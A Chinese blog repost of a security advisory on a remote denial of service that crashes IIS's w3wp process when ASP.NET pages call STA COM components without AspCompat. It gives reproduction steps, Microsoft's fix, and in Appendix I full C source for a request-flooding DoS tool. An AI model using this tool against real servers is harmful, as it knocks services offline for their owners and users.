w3wp remote DoS due to improper reference of STA COM components in ASP.NET

最新推荐文章于 2024-07-17 09:42:24 发布
最新推荐文章于 2024-07-17 09:42:24 发布
阅读量951 收藏
点赞数
分类专栏: 技术 文章标签: asp.net components dos reference socket asp

作者:debasis[AT]hackingspirits.com

厂商:微软公司
MSRC(微软安全响应中心)事件号:MSRC 6367sd
产品信息:IIS Worker Process (w3wp)

1.    产生背景

去年初期,当我对一些运行着asp.net应用程序的站点进行标准攻击测试的时候,我碰到了预料之外的情况:针对工作进程(w3wp)的一个远程DoS。由于成功的几率是随机的,我并没有怎么在意。但是当我在我的家庭实验室进行更多的测试之后,我能够让w3wp进程崩溃再次发生(接近十分之七的成功几率)。这就是我想调试和更深入研究它的原因。

在与MSRC一起为这个问题奋斗一个多月以后,终于作出了结论:崩溃无法人为发生,并且它是由于对asp.net应用程序中的COM或者COM+的不正确调用造成的。程序开发者经常忘记使用“AspCompat”指示,然而当在asp.net中调用COM组件时这又是需要的。下面的链接提供的是“AspCompat”的适当用法:
http://msdn2.microsoft.com/en-us/library/zwk9h2kb.aspx
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnbda/html/dbgch04.asp

附加信息可以在下面的链接中找到:
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnnetsec/html/SecNetch08.asp
http://msdn.microsoft.com/library/default.asp?url=/library/enus/
cpguide/html/cpconCOMComponentCompatibility.asp?frame=true&hidetoc=true
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnaspp/html/monitor_perf.asp

2.    问题描述

缺少“AspCompat”指示会导致网站应用程序的不稳定以及性能上的锐减,仅仅一个简单的网络服务器的负荷增长就能让它崩溃。

如果对服务器上调用COM组件和受限文件(在应用程序目录的路径内部)的某一URL的同时请求数达到了100-300个,那么工作进程就会处理失败或是立即崩溃。URL应该跟下面给出的类似:
http://<Domain>/asp-app/web.config
http://<Domain>/asp-app/default.aspx (调用任何COM组件的示例链接)
http://<Domain>/asp-app/../aspapplogs/log1.log

3.    测试环境

测试已经在如下平台成功:
Windows 2003 (SP1) + IIS 6.0 + .NET Framework 1.1
Windows XP Professional Edition + IIS 6.0 + .NET Framework 1.1

4.    理论依据

a.    找一些URL,并做成列表形式,它们指向运行着asp.net应用程序的网站服务器上的受限文件,同时那些链接都调用了任何一个COM组件。
例如:
http://<Domain>/asp-app/web.config
http://<Domain>/asp-app/user-screen.aspx (链接到COM组件的调用)
http://<Domain>/asp-app/../aspapplogs/log1.log
[…]

b.    这个情况可以通过使用一个exploit代码再次发生,也可以通过使用fiddler(一个工具软件)来构造和重现同时的http请求。Exploit代码w3wp-dos.c可以在附录I中找到。记得修改里面的链接为你的asp.net路径和链接。

c. 假如你想使用fiddler来代替exploit代码,那么就运行fiddler => 转到‘Request Builder’(请求构造)=> 输入前面列表中的任意一个URL,并且设置适当的‘Request Headers
  (请求头部)。作者强烈推荐使用IE。现在发送连续的GET请求到服务器,保持“Return Key”(返回键)被一直按住,直到那个URL100-300http GET / POST请求。同样地,对列表中的所有URL重复这个过程。截图III-a中可以看到更多的细节:

III-a
 

d.现在试着访问那些调用COM组件的asp.net应用程序的链接。如果攻击成功,w3wp.exe就会产生一个无效的服务并随之崩溃。然后,你就会看见服务器端终止的一个错误消息,类似截图III-b

图III-b

除非网站管理员手工点击任一选项终止工作进程,否则工作进程将不会再处理对应用程序的其他请求。如果管理员选择点击选项,工作进程就会自动重启。假如“取消”按钮被点击,一个类似截图III-c的提示框会突然出现。

III-c

也可以通过事件查看器来查看详细信息,类似图III-d

5.    解决方案(微软公司提供)

ASP内在对象(像STA COM组件)默认在ASP.NET中没有被激活,线程池默认是一个MTA(multithreaded apartment)。因此,为了有效使用这些默认的COM组件,@page指示符中的如下属性应该被明确地改变:
<%@Page ASPCompat="true" %>

这个指示使ASP.NET提供对ASP内在对象的访问,同时把线程池改为STA。在增加了这个指示之后,问题得到了解决。

附录I

// w3wp-dos.c //
********************************************************************************************************************
#include "stdafx.h"
#pragma comment (lib,"ws2_32")
#include <winsock2.h>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>
char * pszUnauthLinks(DWORD);
#define portno 80
int main(int argc, CHAR* argv[])
{
char szWorkBuff[100];
DWORD dwCount = 0, dwCounter;
int iCnt = 0, iCount = 0;
SOCKET conn_socket;
WSADATA wsaData;
struct sockaddr_in sin;
struct hostent *phostent;
char *pszTargetHost = new char[MAX_PATH];
UINT uAddr;
if (argc<2)
{
printf("============================================/n");
printf("/t/t w3wp-dos by Debasis Mohanty/n");
printf("/t/t www.hackingspirits.com/n");
printf("============================================/n");
printf("/nUsage: w3wpdos <HostIP / HostName> /n/n");
exit(0);
}
int iRetval;
if((iRetval = WSAStartup(0x202,&wsaData)) != 0) {
printf( "WSAStartup failed with error %d/n",iRetval);
WSACleanup(); exit(1); }
// 对提供的参数长度进行检测
if (strlen(argv[1]) > MAX_PATH) {
printf( "Too long parameter ..../n"); exit(1); }
else
strcpy(pszTargetHost, argv[1]);
// 解决主机名到IP地址间的转换,反之亦然
if(isalpha(pszTargetHost[0]))
phostent = gethostbyname(pszTargetHost);
else {
uAddr = inet_addr(pszTargetHost);
phostent = gethostbyaddr((char *)&uAddr,4,AF_INET);
if(phostent != NULL)
wsprintf( pszTargetHost, "[+] %s", phostent->h_name);
else {
printf( "Failed to resolve IP address, please provide host
name./n" );
WSACleanup();
exit(1);
}
}
if (phostent == NULL ) {
printf("Cannot resolve address [%s]: Error %d/n", pszTargetHost,
WSAGetLastError());
WSACleanup();
printf( "Target host seems to be down or the program failed to resolve
host name.");
printf( "Press enter to exit" );
getchar();
exit(1); }
// 初始化Socket信息
memset(&sin,0,sizeof(sin));
memcpy(&(sin.sin_addr),phostent->h_addr,phostent->h_length);
sin.sin_family = phostent->h_addrtype;
sin.sin_port = htons(portno);
conn_socket = socket(AF_INET, SOCK_STREAM, 0);
if (conn_socket < 0 ) {
printf("Error Opening socket: Error %d/n", WSAGetLastError());
WSACleanup();
return -1;}
printf("============================================/n");
printf("/t/t w3wp-dos by Debasis Mohanty/n");
printf("/t/t www.hackingspirits.com/n");
printf("============================================/n");
printf("[+] Host name: %s/n", pszTargetHost);
wsprintf( szWorkBuff, "%u.%u.%u.%u",
sin.sin_addr.S_un.S_un_b.s_b1,
sin.sin_addr.S_un.S_un_b.s_b2,
sin.sin_addr.S_un.S_un_b.s_b3,
sin.sin_addr.S_un.S_un_b.s_b4 );
printf("[+] Host IP: %s/n", szWorkBuff);
closesocket(conn_socket);
printf("[+] Ready to generate requests/n");
/*计数应由 szBuff array数组中的链接数决定*/
while(dwCount++ < 10)
{
conn_socket = socket(AF_INET, SOCK_STREAM, 0);
memcpy(phostent->h_addr, (char *)&sin.sin_addr, phostent-
>h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(portno);
if(connect(conn_socket, (struct sockaddr*)&sin,sizeof(sin))!=0)
perror("connect");
printf( "[%i] %s", dwCount, pszUnauthLinks(dwCount));
for(dwCounter=1;dwCounter < 9;dwCounter++)
{
send(conn_socket,pszUnauthLinks(dwCount),
strlen(pszUnauthLinks(dwCount)),0);
char *szBuffer = new char[256];
recv(conn_socket, szBuffer, 256, 0);
printf(".");
// if( szBuffer != NULL)
// printf("%s", szBuffer);
delete szBuffer;
Sleep(100);
}
printf("/n");
closesocket(conn_socket);
}
return 1;
}
char * pszUnauthLinks( DWORD dwIndex )
{
char *szBuff[10];
TCHAR *szGetReqH = new char[1024];
/*修改你的asp.net链接下面的链接列表,列表应该支持调用任何COM组件的链接,以及其他在asp.net应用程序路径下的受限链接. */
szBuff[1] = "GET /aspnet-app//web.config";
szBuff[2] = "GET /aspnet-app//../aspnetlogs//log1.logs";
szBuff[3] = "GET /aspnet-app//default-userscreen.aspx";
szBuff[4] = "GET /aspnet-app//users/config.aspx";
szBuff[5] = "GET /aspnet-app//links/anycomref.aspx"; //
szBuff[6] = "GET /aspnet-app//com-ref-link1.aspx"; // Links of
pages referring
szBuff[7] = "GET /aspnet-app//com-ref-link2.aspx"; // COM
components.
szBuff[8] = "GET /aspnet-app//com-ref-link3.aspx"; //
szBuff[9] = "GET /aspnet-app//com-ref-link4.aspx"; //
/* 准备目标链接的GET请求*/
strcpy(szGetReqH, szBuff[dwIndex]);
strcat(szGetReqH, " HTTP/1.1/r/n");
strcat(szGetReqH, "Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*/r/n");
strcat(szGetReqH, "Accept-Language: en-us/r/n");
strcat(szGetReqH, "Accept-Encoding: gzip, deflate/r/n");
strcat(szGetReqH, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows
NT 5.0; .NET CLR 1.1.4322)/r/n");
strcat(szGetReqH, "Host: /r/n" );
strcat(szGetReqH, "Connection: Keep-Alive/r/n" );
/* 插入一个有效的Session Cookie和ASPVIEWSTATE以获得更多有效结果*/
strcat(szGetReqH, "Cookie:
ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;/r/n" );
strcat(szGetReqH,
".ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F74
4632F1CC480589912023FA6D703BF02680BE6D733518A998AD1BE1FCD082F1CBC4DB54870BFE76A
C713AF05B971D/r/n/r/n" );
//返回szBuff[dwIndex];
return szGetReqH;
}
********************************************************************************************************************

tomato4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CWE ID 611:Improper Restriction of XML External Entity Reference
Aron2278的博客
08-13 1084
问题描述 XML文档可选地包含文档类型定义 (DTD),除其他功能外,它还支持XML实体的定义,可以通过以URI的形式替换字符串来定义实体,XML解析器可以访问此URI的内容并将这些内容嵌入回XML文档中以供进一步处理。但当URI解析为预期控制范围之外的文档,会导致程序将不正确的文档嵌入到其输出中。 程序通过使用 file:// URI 定义外部实体的XML文件,攻击者就可以修改URI来获取本地文件内容,例如,“file:///c:/winnt/win.ini”之类的 URI 指定(在 Windows中)文
CWE ID 113: Improper Neutralization of CRLF Sequences in HTTP Headers (‘HTTP Response Splitting‘)
Aron2278的博客
07-28 886
CWE ID 113: Improper Neutralization of CRLF Sequences in HTTP Headers (‘HTTP Response Splitting’) 问题描述 HTTP响应拆分缺陷,当调用一个存在该缺陷的请求时,很容易受到攻击,将不受信任的内容写入HTTP请求头中,导致缓存中毒和跨站点脚本攻击。 解决方案 1、输入校验 注意规范构建 HTTP 请求头,避免使用未经验证的输入数据,对构建内容进行合法校验,如:设定编码规范(UTF-8)、过滤特殊符号("\n", “
ASP.NET ViewState详解
taoerchun的专栏
12-18 686
作者:Infinities Loop 概述 ViewState是一个被误解很深的动物了。我希望通过此文章来澄清人们对ViewState的一些错误认识。为了达到这个目的,我决定从头到尾详细的描述一下整个ViewState的工作机制,其中我会同时用一些例子说明我文章中的观点,结论。比如我会用静态控件(declared controls)和动态控件(dynamic controls)两个方面
CWE-911: Improper Update of Reference Count(引用计数更新不当)
plstudio1的博客
06-06 298
ID: 911 类型:基础 结构:简单 状态:未完成 描述 软件使用引用计数来管理资源,但不会更新或错误地更新引用计数。 扩展描述 当跟踪有多少对象包含对特定资源的引用(如内存管理或垃圾收集)时,可以使用引用计数。当引用计数为零时,可以取消分配或重用资源,因为没有更多的对象使用它。如果引用计数意外地达到零,那么即使资源仍在使用中,也可...
【悟空云课堂】第十二期:LDAP注入漏洞(CWE-90: Improper Neutralization of Special Elements used in an LDAP Query)
Tianqi_Wukong的博客
01-20 801
【悟空云课堂】第十二期:LDAP注入漏洞 什么是LDAP注入漏洞? LDAP是轻量目录访问协议(Lightweight Directory Access Protocol)的缩写,提供访问目录数据库方法的服务和协议,常用于与目录数据库组成目录服务。其中目录是一个为查询、浏览和搜索而优化的专业分布式数据库,它呈树状结构组织数据,就好象Linux/Unix系统中的文件目录一样。目录数据库和关系数据库不同,不适于存储修改频繁的数据。 类似以下的信息适合储存在目录中: 企业员工信息,如姓名、电话、邮箱等; 公用证书
Asp.Net MVC 身份认证
06-27 160
Asp.Net MVC 登录验证: 1. Windows身份认证,主要用于Intranet上域环境。使用Windows验证时,用户的Windows安全令牌在用户访问整个网站期间使用HTTP请求,进行消息发送。应用程序会使用这个令牌在本地(或者域)里验证用户账号的有效性,也会评估用户所在角色所具备的权限。当用户验证失败或者未授权时,浏览器就会定向到特定的页面让用户输入自己的安全凭证(用户...
【转】ASP.NET ViewState详解
SzzXiaoY的专栏
02-12 904
作者:Infinities Loop 概述 ViewState是一个被误解很深的动物了。我希望通过此文章来澄清人们对ViewState的一些错误认识。为了达到这个目的,我决定从头到尾详细的描述一下整个ViewState的工作机制,其中我会同时用一些例子说明我文章中的观点,结论。比如我会用静态控件(declared controls)和动态控件(dynamic controls)两个方面
Java - Improper Neutralization of Input leads to Reflected File Download
A_bad_horse的专栏
03-15 151
Description Rule:Improper Neutralization of Input leads to Reflected File Download Vulnerability Type:Injection Reflected File Download (RFD) is a web attack vector that enables attackers to gain complete control over a victim’s machine. It happens w..
谈谈ASP.NET Core 中的模型验证(自定义验证和远程验证)
覃鸿宇的博客
02-29 1806
在上篇文章中,我对ASP.NET CORE中的模型绑定进行介绍,现在就说明如何对模型进行验证 首先,ASP.NET CORE自带默认的模型绑定,还是看这个例子, ModelState.IsValid方法会对该模型中每个对象进行验证(是否为空,是格式是否正确),无效的对象则将在客户端提示错误信息,该错误信息由ModelState.AddModelError(string.Empty, error.D...
The Robust Beauty of Improper Linear Models in Decision Making - July 1979-计算机科学
04-22
The Robust Beauty of Improper Linear Models in Decision MakingROBYN M. DAWES University of OregonABSTRACT: Proper linear models are those in which predictor variables are given weights in such a way ...
C# ASP.NET不妥控件编程实例1
03-07
在C# ASP.NET开发中,不妥控件(Improper Control)编程实例是学习Web应用程序设计的重要环节。这些实例通常涉及到如何有效地创建、配置和使用ASP.NET中的各种服务器控件,以及如何处理用户交互和数据绑定。在这个...
Keil v5 Error: Encountered an improper argument 个人实测解决办法
04-20
在使用Keil μVision v5这款著名的嵌入式开发工具时,用户可能会遇到一个令人头疼的问题:“Error: Encountered an improper argument”。这个错误通常在编译或调试过程中出现,导致程序无法正常运行或者调试器无法...
Encountered-an-improper-argument问题方法
07-02
keil升级5.25pre(临近几个...会提示Error: Encountered an improper argument 主要解决办法就是替换UV4.exe,可以将低版本中的UV4.exe直接替换 具体操作看:https://blog.csdn.net/u011624093/article/details/80880708
基于asp.net小区物业信息管理系统设计与实现
qq_251836457的博客
07-17 969
博主介绍:专注于Java .net php phython 小程序 等诸多技术领域和毕业项目实战、企业信息化系统建设,从业十五余年开发设计教学工作☆☆☆ 精彩专栏推荐订阅☆☆☆☆☆不然下次找不到哟我的博客空间发布了1000+毕设题目 方便大家学习使用感兴趣的可以,还有大家在毕设选题,项目以及论文编写等相关问题都可以给我留言咨询,希望帮助更多的人开发背景21世纪,早已进入互联网信息快速发展的时代,互联网的普及给人们带来了许多便利。像大部分的小区等都有自己小区管理系统,而小区。
基于 asp.net家庭财务管理系统设计与实现
qq_251836457的博客
07-17 781
1、实时性问题,由于本系统是B/S模式的,所以系统的响应速度是很重要的,当有大量的用户同时访问时,这样系统的响应速度必然下降。对于当今的科学信息是一次重大的飞越,为人们的生活、工作、学习带来潜移默化的影响。其一,对于花费很多时间学会C、C++语言的程序员来说,可以不必丢弃以前的知识,就可以使用这种新的语言开发程序,尽管C#中有一些新概念、新技术和新函数,但一般而言它的语言及其语法是跟C、C++类似的,而且对于用C++编写好的代码也可被重用,主要原因是C#具有调用已有代码和系统库中的库函数的机制;
物联网工程_基于RFID的食堂食品安全监测系统设计.docx
07-20
物联网工程_基于RFID的食堂食品安全监测系统设计
VisualSVN-VS2022
最新发布
07-20
VisualSVN-VS2022-8.0.5.vsix SVNVS插件,使用VS自带更新速度太慢,可下载后直接安装即可
基于PSO优化的BP神经网络训练与测试matlab仿真,包括程序,注释,参考文献,操作步骤
07-20
1.版本:matlab2022A。 2.包含:程序,中文注释,参考文献,仿真操作步骤(使用windows media player播放)。 3.领域:PSO优化的BP神经网络 4.仿真效果:仿真效果可以参考博客同名文章《基于PSO优化的BP神经网络训练与测试matlab仿真》 5.内容:基于PSO优化的BP神经网络训练与测试matlab仿真。粒子群优化(Particle Swarm Optimization, PSO)结合BP(Backpropagation)神经网络是一种常见的优化方法,用于提升神经网络的学习能力和泛化能力。PSO不仅帮助BP神经网络找到了一个较好的初始解,从而可能加快了训练过程并提高了最终模型的质量,而且还能探索到更广泛的解空间,有助于避免局部最优解。 6.注意事项:注意MATLAB左侧当前文件夹路径,必须是程序所在文件夹位置,具体可以参考视频录。
Improper call to JPEG library in state 100
07-14
"Improper call to JPEG library in state 100"错误通常表示在JPEG库的错误状态(state)下进行了不正确的调用。这可能是因为你在使用libjpeg库的函数时出现了一些问题,导致库处于错误的状态。 以下是一些常见的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值